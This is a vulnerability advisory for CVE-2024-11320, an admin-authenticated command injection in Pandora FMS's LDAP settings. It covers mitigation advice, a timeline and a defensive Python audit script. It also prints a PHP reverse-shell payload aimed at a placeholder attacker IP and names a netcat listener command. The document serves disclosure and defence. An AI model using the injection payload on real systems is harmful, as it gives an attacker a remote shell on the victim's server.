CVE-2024-11320: Remote Code Execution in Pandora FMS via LDAP Injection
Repository: https://github.com/mhaskar/CVE-2024-11320
CVE ID: CVE-2024-11320
CVSS Score: 9.8 (Critical)
Affected Versions: Pandora FMS v7.0NG.700 to v7.0NG.777.4
Discovered by: Askar (https://github.com/mhaskar)
Summary
CVE-2024-11320 is a critical command injection vulnerability in Pandora FMS, a monitoring software solution. The flaw allows remote attackers with administrative access to execute arbitrary system commands through the web-based LDAP authentication configuration interface.
A public proof-of-concept (PoC) exploit was released by Askar, demonstrating the vulnerability with a functional Python script that launches a reverse shell from the target system.
Vulnerability Details
- Type: OS Command Injection (CWE-77)
- Impact: Remote Code Execution (RCE)
- Trigger Point: LDAP authentication configuration
- Required Access: Admin-level login to the web panel
Root Cause
Pandora FMS fails to properly sanitize input values submitted to the LDAP configuration fields. When attackers insert shell metacharacters and payloads into the ldap_admin_login field, the backend processes the malicious input and executes it on the server, leading to arbitrary code execution.
Proof of Concept
The PoC pandora-exploit.py carries out the following:
- Logs in using valid admin credentials and retrieves a CSRF token.
- Sends a POST request to change the authentication method to LDAP.
- Injects a reverse shell payload in the ldap_admin_login field.
- Waits for a reverse connection from the target.
Example Payload
payload = "';php -r '\$sock=fsockopen(\"ATTACKER_IP\",PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");' #"
Screenshot
The repo includes pandora-poc.png, showing a successful reverse shell session received on the attacker's listener, confirming exploitation.
Exploit Requirements
- Admin credentials for the Pandora web interface
- Vulnerable version of Pandora FMS (<= 7.0NG.777.4)
- Python 3 with the requests and bs4 libraries
- A listener running (e.g., nc -lvnp PORT)
Affected Versions
- Pandora FMS from v7.0NG.700 up to and including v7.0NG.777.4
Mitigation
- Upgrade to v7.0NG.777.5 or later to patch the vulnerability.
- Disable LDAP authentication if not required.
- Monitor and restrict admin access to the Pandora web interface.
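An added example, not part of the advisory or the PoC repository: a small Python audit helper that checks a Pandora FMS version string against the affected range given above and flags an ldap_admin_login value carrying shell metacharacters, the kind of check a defender can run over a configuration export before and after patching. The audit inputs (version string, LDAP enabled flag, field value) are assumed to be pulled from the instance's own setup data; the field name is the one the advisory names.

```python
import re

FIRST_AFFECTED = "7.0NG.700"   # start of the affected range named in the advisory
FIXED_VERSION = "7.0NG.777.5"  # first patched version named in the advisory

# Characters that break out of a quoted shell argument or chain further commands.
# A legitimate LDAP admin login (a DN or a username) never needs any of them.
SHELL_META = re.compile(r"[;|&`$'\"\n<>(){}]")


def parse_version(v):
    """Turn 'v7.0NG.777.4' into a comparable tuple (7, 0, 777, 4)."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)NG\.(\d+)(?:\.(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Pandora FMS version: {v!r}")
    major, minor, build, patch = m.groups()
    return (int(major), int(minor), int(build), int(patch or 0))


def is_affected(v):
    """True if v lies in [7.0NG.700, 7.0NG.777.5), i.e. up to and including 777.4."""
    return parse_version(FIRST_AFFECTED) <= parse_version(v) < parse_version(FIXED_VERSION)


def ldap_login_suspicious(value):
    """Flag an ldap_admin_login value that contains shell metacharacters."""
    return SHELL_META.search(value) is not None


def audit(version, ldap_enabled, ldap_admin_login):
    """Return a list of findings for one Pandora FMS instance (empty list = clean)."""
    findings = []
    if is_affected(version):
        findings.append(f"version {version} is in the affected range; upgrade to {FIXED_VERSION} or later")
    if ldap_enabled and ldap_login_suspicious(ldap_admin_login):
        findings.append("ldap_admin_login contains shell metacharacters; inspect the setup for tampering")
    return findings


if __name__ == "__main__":
    # Constructed sample: an unpatched instance whose LDAP admin login has been tampered with.
    for line in audit("v7.0NG.777.4", True, "'; id #"):
        print(line)
```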
Timeline
- Vulnerability discovered: Early 2024
- PoC published by mhaskar: March 2024
- Patch released by Pandora FMS: April 2024
- CVE published: CVE-2024-11320
Conclusion
CVE-2024-11320 poses a significant threat to Pandora FMS installations with outdated versions and active admin interfaces. The availability of a public exploit lowers the bar for attacks, making immediate patching critical. Organizations should audit authentication configuration endpoints, apply updates, and limit administrative access to reduce their risk exposure.